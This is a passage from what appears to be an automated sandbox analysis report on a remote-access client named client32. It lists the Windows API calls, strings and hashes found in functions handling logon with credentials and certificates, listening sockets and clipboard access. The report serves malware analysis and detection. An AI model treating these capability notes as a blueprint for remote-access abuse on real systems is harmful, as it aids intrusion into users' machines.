                                                          • Part of subcall function 110A4AA0: GetProcAddress.KERNEL32(?,CertAddEncodedCertificateToStore), ref: 110A4B64
                                                          • Part of subcall function 110A4AA0: GetProcAddress.KERNEL32(?,CertSetCertificateContextProperty), ref: 110A4B71
                                                          • Part of subcall function 110A4AA0: GetProcAddress.KERNEL32(00000000,CertGetCertificateContextProperty), ref: 110A4B7E
                                                          • Part of subcall function 110A4AA0: GetProcAddress.KERNEL32(?,CryptAcquireCertificatePrivateKey), ref: 110A4B8B
                                                          • Part of subcall function 110A4AA0: GetProcAddress.KERNEL32(?,CertEnumCertificatesInStore), ref: 110A4B98
                                                          • Part of subcall function 110A4AA0: GetProcAddress.KERNEL32(00000000,CertGetEnhancedKeyUsage), ref: 110A4BA5
                                                        • GetModuleHandleA.KERNEL32(Advapi32.dll,82E0FB89,?,?,?,?,11172CDB,000000FF,?,110E94A1,00000000,00000000,?,?,?,FFFFFFFF), ref: 110A591E
                                                        • GetProcAddress.KERNEL32(00000000,CredMarshalCredentialA), ref: 110A5930
                                                        • GetProcAddress.KERNEL32(?,CredFree), ref: 110A5948
                                                        • GetLastError.KERNEL32(?,110E94A1,00000000,00000000,?,?,?,FFFFFFFF), ref: 110A599C
                                                        • CryptReleaseContext.ADVAPI32(?,00000000,82E0FB89,?,?,?,?,11172CDB,000000FF,?,110E94A1,00000000,00000000,?,?,?), ref: 110A5D41
                                                        • SetLastError.KERNEL32(00000057,82E0FB89,?,?,?,?,11172CDB,000000FF,?,110E94A1,00000000,00000000,?,?,?,FFFFFFFF), ref: 110A5D8B
                                                        • FreeLibrary.KERNEL32(?,82E0FB89,?,?,?,?,11172CDB,000000FF,?,110E94A1,00000000,00000000,?,?,?,FFFFFFFF), ref: 110A5D9C
                                                        Strings
                                                        • CertGetCertificateContextProperty (3) FAILED (%d), xrefs: 110A5C35
                                                        • CertGetCertificateContextProperty (2) FAILED (%d), xrefs: 110A5BFA
                                                        • CertGetCertificateContextProperty (1) failed (%d), xrefs: 110A5BB3
                                                        • CredFree, xrefs: 110A593C
                                                        • CredMarshalCredentialA, xrefs: 110A5924
                                                        • Advapi32.dll, xrefs: 110A5919
                                                        • LogonUserWithCert FAILED (%d) , xrefs: 110A5D79
                                                        • LogonUserWithCert - Advapi32.dll does NOT provide required functionality!, xrefs: 110A5CE9
                                                        • LogonUserWithCert - Crypt32.dll NOT found!!!, xrefs: 110A58B0
                                                        • CertAddCertificateContextToStore FAILED (%d), xrefs: 110A5B7B
                                                        • AttemptLogon FAILED [status: 0x%08x], xrefs: 110A5CBC
                                                        • \\.\%s\, xrefs: 110A59B6
                                                        • LogonUserWithCert - Crypt32.dll does NOT provide required functionality!, xrefs: 110A5CFD
                                                        • LogonUserWithCert - CredMarshalCredential FAILED (%d), xrefs: 110A5CDF
                                                        • CryptGetProvParam FAILED (%d), xrefs: 110A5AE3, 110A5B3A
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        • Associated: 0000000B.00000002.3754555931.0000000011000000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754755220.00000000111DC000.00000004.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.00000000111E1000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.000000001120E000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011210000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011213000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011215000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011241000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011332000.00000002.00000001.01000000.00000008.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: AddressProc$ErrorLastLibrary$ContextCryptFreeHandleLoadModuleRelease
                                                        • String ID: Advapi32.dll$AttemptLogon FAILED [status: 0x%08x]$CertAddCertificateContextToStore FAILED (%d)$CertGetCertificateContextProperty (1) failed (%d)$CertGetCertificateContextProperty (2) FAILED (%d)$CertGetCertificateContextProperty (3) FAILED (%d)$CredFree$CredMarshalCredentialA$CryptGetProvParam FAILED (%d)$LogonUserWithCert - Advapi32.dll does NOT provide required functionality!$LogonUserWithCert - CredMarshalCredential FAILED (%d)$LogonUserWithCert - Crypt32.dll NOT found!!!$LogonUserWithCert - Crypt32.dll does NOT provide required functionality!$LogonUserWithCert FAILED (%d) $\\.\%s\
                                                        • API String ID: 455412317-1640292549
                                                        • Opcode ID: 11c0ce5a15eb0ad978e2ce617f810eb73a51ac8ea6531c097df6ff3739c903a0
                                                        • Instruction ID: 14d655196b2d9980db4aac9cab0ede2ffb9987fd2d114c6750bd9b18e7e5f0cf
                                                        • Opcode Fuzzy Hash: 11c0ce5a15eb0ad978e2ce617f810eb73a51ac8ea6531c097df6ff3739c903a0
                                                        • Instruction Fuzzy Hash: EAE162B5D0022A9FDB20DF909CC4AEEB7B8BF44358F4441E9E919A3214E7315E84CF61
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        • Associated: 0000000B.00000002.3754555931.0000000011000000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754755220.00000000111DC000.00000004.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.00000000111E1000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.000000001120E000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011210000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011213000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011215000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011241000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011332000.00000002.00000001.01000000.00000008.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: _memset
                                                        • String ID: #$$$$CLIENTNAME$$$PROMPT$$%03d%s$..\ctl32\Connect.cpp$.prn$op - obuf <= _tsizeof (obuf)
                                                        • API String ID: 2102423945-3087083064
                                                        • Opcode ID: 39b9b20f07d8f67a96a4a039c5d39d8e0a07284d7f924ca62ab7285e05a18b76
                                                        • Instruction ID: 9732641257c0b20e71b33c15b159d9766e9e212ca738346d0ff0b7fb1b6b53a2
                                                        • Opcode Fuzzy Hash: 39b9b20f07d8f67a96a4a039c5d39d8e0a07284d7f924ca62ab7285e05a18b76
                                                        • Instruction Fuzzy Hash: 5AA10775E002565FDB12CF64CC80BEEBBFDAF86308F1481D9D99AD7241DA31AA45CB90
                                                        APIs
                                                          • Part of subcall function 110D37D0: EnterCriticalSection.KERNEL32(111D8C5C,11017228,82E0FB89,?,?,?,111B83A0,11175D28,000000FF,?,11019222), ref: 110D37D1
                                                        • __CxxThrowException@8.LIBCMT ref: 110CD253
                                                          • Part of subcall function 11151071: RaiseException.KERNEL32(?,?,11103644,?,?,?,?,?,11103644,?,111B83A0), ref: 111510B3
                                                          • Part of subcall function 110CCED0: __CxxThrowException@8.LIBCMT ref: 110CCF42
                                                          • Part of subcall function 110CCED0: getpeername.WSOCK32(?,?,00000000,82E0FB89), ref: 110CCF60
                                                          • Part of subcall function 11010AF0: _memmove.LIBCMT ref: 11010B2D
                                                        • gethostbyname.WSOCK32(0.0.0.0,82E0FB89,?,?,00000000), ref: 110CD265
                                                        • WSAGetLastError.WSOCK32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,11174EAB), ref: 110CD271
                                                        • _memmove.LIBCMT ref: 110CD29B
                                                        • htons.WSOCK32(00000000), ref: 110CD2C1
                                                        • socket.WSOCK32(00000002,00000001,00000000), ref: 110CD2D5
                                                        • WSAGetLastError.WSOCK32 ref: 110CD2E3
                                                        • #21.WSOCK32(00000000,0000FFFF,00000004,?,00000004), ref: 110CD301
                                                        • bind.WSOCK32(?,?,00000010), ref: 110CD311
                                                        • WSAGetLastError.WSOCK32 ref: 110CD31C
                                                        • listen.WSOCK32(?,7FFFFFFF,82E0FB89,?,?,00000000), ref: 110CD338
                                                        • WSAGetLastError.WSOCK32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,11174EAB), ref: 110CD343
                                                        • accept.WSOCK32(?,00000000,00000000,000000FF), ref: 110CD3A6
                                                        • WSAGetLastError.WSOCK32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,11174EAB), ref: 110CD3B4
                                                          • Part of subcall function 110D55B0: OutputDebugStringA.KERNEL32(111D8BD0,000000FF,NsAppSystem::CNsAsException::CNsAsException,0000002B,111D8BD0,00000000,000000FF,82E0FB89,?,00000000,00000000,?,?,?,00000000,111761AB), ref: 110D5663
                                                          • Part of subcall function 110D55B0: OutputDebugStringA.KERNEL32(1118BEE8,?,?,?,00000000,111761AB,000000FF,?,110D2C63,?,Invalid Server paramters), ref: 110D566A
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        • Associated: 0000000B.00000002.3754555931.0000000011000000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754755220.00000000111DC000.00000004.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.00000000111E1000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.000000001120E000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011210000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011213000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011215000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011241000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011332000.00000002.00000001.01000000.00000008.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: ErrorLast$DebugException@8OutputStringThrow_memmove$CriticalEnterExceptionRaiseSectionacceptbindgethostbynamegetpeernamehtonslistensocket
                                                        • String ID: 0.0.0.0$Listen() the socket is not closed
                                                        • API String ID: 1096978048-1307932746
                                                        • Opcode ID: a730248214e9a563b59b10436eac38ba2d44abaab5b0afecdef3ac821dfa7065
                                                        • Instruction ID: 956b2696774708f28c41c5c40744a434557477a21071a8e5edb7c5ae032104a2
                                                        • Opcode Fuzzy Hash: a730248214e9a563b59b10436eac38ba2d44abaab5b0afecdef3ac821dfa7065
                                                        • Instruction Fuzzy Hash: 0461A5B5E00606AFDB14DFE4C980B9EF7B5AF48B24F108659E526E72C0DB74A5018FA1
                                                        APIs
                                                        • _calloc.LIBCMT ref: 11039116
                                                        • _free.LIBCMT ref: 11039210
                                                          • Part of subcall function 11102870: _malloc.LIBCMT ref: 11102889
                                                          • Part of subcall function 11102870: wsprintfA.USER32 ref: 111028A4
                                                          • Part of subcall function 11102870: _memset.LIBCMT ref: 111028C7
                                                          • Part of subcall function 110C3E90: FindResourceExA.KERNEL32(00000000,00000005,?,00000000), ref: 110C3F15
                                                          • Part of subcall function 110C3E90: LoadResource.KERNEL32(00000000,00000000), ref: 110C3F44
                                                          • Part of subcall function 110C3E90: LockResource.KERNEL32(00000000), ref: 110C3F68
                                                          • Part of subcall function 110C3E90: CreateDialogIndirectParamA.USER32(00000000,00000000,1111EF19,110C2640,00000000), ref: 110C3F99
                                                          • Part of subcall function 110C3E90: CreateDialogIndirectParamA.USER32(00000000,00000000,1111EF19,110C2640,00000000), ref: 110C3FB4
                                                          • Part of subcall function 110C3E90: GetLastError.KERNEL32 ref: 110C3FD9
                                                        • _calloc.LIBCMT ref: 11039225
                                                        • _free.LIBCMT ref: 11039260
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        • Associated: 0000000B.00000002.3754555931.0000000011000000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754755220.00000000111DC000.00000004.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.00000000111E1000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.000000001120E000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011210000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011213000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011215000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011241000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011332000.00000002.00000001.01000000.00000008.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Resource$CreateDialogIndirectParam_calloc_free$ErrorFindLastLoadLock_malloc_memsetwsprintf
                                                        • String ID: $CLTCONN.CPP$DoUserLogin$Get login name. Check if logged in$GetName$Login name %s$Not logged in!$u
                                                        • API String ID: 2195741704-1552251038
                                                        • Opcode ID: 5ae14f198104c464671bab3f216baa493da83b8bef8af5054f289781c9ff8bbe
                                                        • Instruction ID: 53a8b38fcb329f41cef8c2a65a5fb3865c4ab55a76465e48db301f8623a07c24
                                                        • Opcode Fuzzy Hash: 5ae14f198104c464671bab3f216baa493da83b8bef8af5054f289781c9ff8bbe
                                                        • Instruction Fuzzy Hash: 1E61F475E54611AFD740EFA0DCC5FDAF3A4AF8471DF104268E9296B2C0EBB16940CB92
                                                        APIs
                                                        • GetModuleFileNameA.KERNEL32(00000000,?,00000104,00000000,?,1105649A), ref: 110ED2F4
                                                          • Part of subcall function 1107C480: _strrchr.LIBCMT ref: 1107C48E
                                                        • LoadLibraryExA.KERNEL32(?,00000000,00000002,?,1105649A), ref: 110ED336
                                                        • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 110ED351
                                                        • LoadLibraryExA.KERNEL32(?,00000000,00000002,?,1105649A), ref: 110ED38D
                                                        • GetLastError.KERNEL32(?,1105649A), ref: 110ED398
                                                        • FormatMessageA.KERNEL32(00000900,?,?,00000000,?,00000000,?,00000000,?,1105649A), ref: 110ED3DD
                                                        • LocalFree.KERNEL32(?,?,1105649A), ref: 110ED45C
                                                        • _memmove.LIBCMT ref: 110ED48D
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        • Associated: 0000000B.00000002.3754555931.0000000011000000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754755220.00000000111DC000.00000004.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.00000000111E1000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.000000001120E000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011210000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011213000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011215000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011241000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011332000.00000002.00000001.01000000.00000008.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: LibraryLoad$DirectoryErrorFileFormatFreeLastLocalMessageModuleNameSystem_memmove_strrchr
                                                        • String ID: %s (%d)$??? $Cannot find message %d$Cannot open file %s, error %d$\PCImsg.dll
                                                        • API String ID: 3675426511-2756047042
                                                        • Opcode ID: 24b43653ea149b7fc03000e038b4f402e07b261599e85d7f4999701ef2a47801
                                                        • Instruction ID: ced640a395ebe727b00206b968de0e8db358c6ace47da34f22fb5d2595477f7d
                                                        • Opcode Fuzzy Hash: 24b43653ea149b7fc03000e038b4f402e07b261599e85d7f4999701ef2a47801
                                                        • Instruction Fuzzy Hash: EB5119B5E0021AAFD704CF79DC89FDEF7B8EB59308F0480A9E955D7240EA71A9448B91
                                                        APIs
                                                        • SetWindowLongA.USER32(?,000000FC,?), ref: 1114D476
                                                        • RemovePropA.USER32(?), ref: 1114D495
                                                        • RemovePropA.USER32(?), ref: 1114D4A4
                                                        • RemovePropA.USER32(?,00000000), ref: 1114D4B3
                                                          • Part of subcall function 11027FB0: GetLastError.KERNEL32(?,00000000,?), ref: 11027FCC
                                                          • Part of subcall function 11027FB0: wsprintfA.USER32 ref: 11028017
                                                          • Part of subcall function 11027FB0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11028053
                                                          • Part of subcall function 11027FB0: ExitProcess.KERNEL32 ref: 11028069
                                                        • CallWindowProcA.USER32(?,?,?,?,?), ref: 1114D80A
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        • Associated: 0000000B.00000002.3754555931.0000000011000000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754755220.00000000111DC000.00000004.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.00000000111E1000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.000000001120E000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011210000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011213000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011215000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011241000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011332000.00000002.00000001.01000000.00000008.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: PropRemove$Window$CallErrorExitLastLongMessageProcProcesswsprintf
                                                        • String ID: ..\ctl32\wndclass.cpp$old_wndproc
                                                        • API String ID: 1777853711-3305400014
                                                        • Opcode ID: 1b3096391e9100c0dff8ec288cab940e3f3d68445cee506a92fe49f2f52b3cec
                                                        • Instruction ID: a9ca4b3d29b6757e08e08d1351ada2b625a191a468bc1592360ff9c51f34a9c8
                                                        • Opcode Fuzzy Hash: 1b3096391e9100c0dff8ec288cab940e3f3d68445cee506a92fe49f2f52b3cec
                                                        • Instruction Fuzzy Hash: CAC15DB63040199FDB08CE69E894E7FB3E9EBC8711B50466EF946C7781DA31AC1187B1
                                                        APIs
                                                        Strings
                                                        • RDH::Dialog already created so restore, xrefs: 1102322C
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        • Associated: 0000000B.00000002.3754555931.0000000011000000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754755220.00000000111DC000.00000004.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.00000000111E1000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.000000001120E000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011210000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011213000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011215000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011241000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011332000.00000002.00000001.01000000.00000008.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Window_memset_strncpy$BringCurrentIconicThread
                                                        • String ID: RDH::Dialog already created so restore
                                                        • API String ID: 2558468902-3779292929
                                                        • Opcode ID: 1b6332f507f83461602a68dd11a8f54dcfe15ffaf1a6ecce51fca5189bdcfe15
                                                        • Instruction ID: 9fb44cbcd3b538895b0def4521801f9bfde370520260cf145bbd00386ee71607
                                                        • Opcode Fuzzy Hash: 1b6332f507f83461602a68dd11a8f54dcfe15ffaf1a6ecce51fca5189bdcfe15
                                                        • Instruction Fuzzy Hash: 5591A175E046099FDB00CFA9C884BEEBBF5BF89308F548569E8159B381DB74A944CF90
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        • Associated: 0000000B.00000002.3754555931.0000000011000000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754755220.00000000111DC000.00000004.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.00000000111E1000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.000000001120E000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011210000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011213000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011215000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011241000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011332000.00000002.00000001.01000000.00000008.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID:
                                                        • String ID: CheckClip Error: Can't open clip, e=%d$Client$DisableClipBoard$Sendclip Error: Cant open clip$openclip Error: Cant open clip
                                                        • API String ID: 0-293745777
                                                        • Opcode ID: 127b5213422b15e425346da24cd16221a59b034f56f518ca3ab0e2a8f7d037f5
                                                        • Instruction ID: 6deb9f8abc6a4cad7d773f1ab5b5bd319d2f4c8d3dcf5da947e35b6bef66306d
                                                        • Opcode Fuzzy Hash: 127b5213422b15e425346da24cd16221a59b034f56f518ca3ab0e2a8f7d037f5
                                                        • Instruction Fuzzy Hash: 04A1D275F102059FD710DBA4DC80FAAB3B5AFDD319F144199EA4A9B280EB71F940CB91
                                                        APIs
                                                        • GetTickCount.KERNEL32 ref: 110E940F
                                                        • LogonUserA.ADVAPI32(?,00000000,?,?,?,FFFFFFFF), ref: 110E94BE
                                                        • GetTickCount.KERNEL32 ref: 110E94C6
                                                        • GetLastError.KERNEL32 ref: 110E94FE
                                                          • Part of subcall function 11027FB0: GetLastError.KERNEL32(?,00000000,?), ref: 11027FCC
                                                          • Part of subcall function 11027FB0: wsprintfA.USER32 ref: 11028017
                                                          • Part of subcall function 11027FB0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11028053
                                                          • Part of subcall function 11027FB0: ExitProcess.KERNEL32 ref: 11028069
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        • Associated: 0000000B.00000002.3754555931.0000000011000000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754755220.00000000111DC000.00000004.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.00000000111E1000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.000000001120E000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011210000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011213000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011215000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011241000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011332000.00000002.00000001.01000000.00000008.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: CountErrorLastTick$ExitLogonMessageProcessUserwsprintf
                                                        • String ID: IsA()$LogonUser(%s, %s) took %d ms, ret %d$e:\nsmsrc\nsm\1201\1201f2\ctl32\NSMString.h$null
                                                        • API String ID: 307273675-931856353
                                                        • Opcode ID: 542ecd84b7764c589124868231b19b0268137c9ef5a69bea329ee57c5c71da03
                                                        • Instruction ID: f479a602a004497ae36e32c9422561ea4b7ba1cfc2dda626e9e37eed398c0a62
                                                        • Opcode Fuzzy Hash: 542ecd84b7764c589124868231b19b0268137c9ef5a69bea329ee57c5c71da03
                                                        • Instruction Fuzzy Hash: 4431A2B9A00A06AFC720DF56DC88E9AF7F9FF88314B108258E81593751EB30F905CB60
                                                        APIs
                                                        • IsClipboardFormatAvailable.USER32(?), ref: 110310C1
                                                        • GetClipboardData.USER32(?), ref: 110310DD
                                                        • GetClipboardFormatNameA.USER32(?,?,00000050), ref: 1103115C
                                                        • GetLastError.KERNEL32 ref: 11031166
                                                        • GlobalUnlock.KERNEL32(00000000), ref: 11031186
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        • Associated: 0000000B.00000002.3754555931.0000000011000000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754755220.00000000111DC000.00000004.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.00000000111E1000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.000000001120E000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011210000.00000002.00000001.01000000.00000008.sdmp
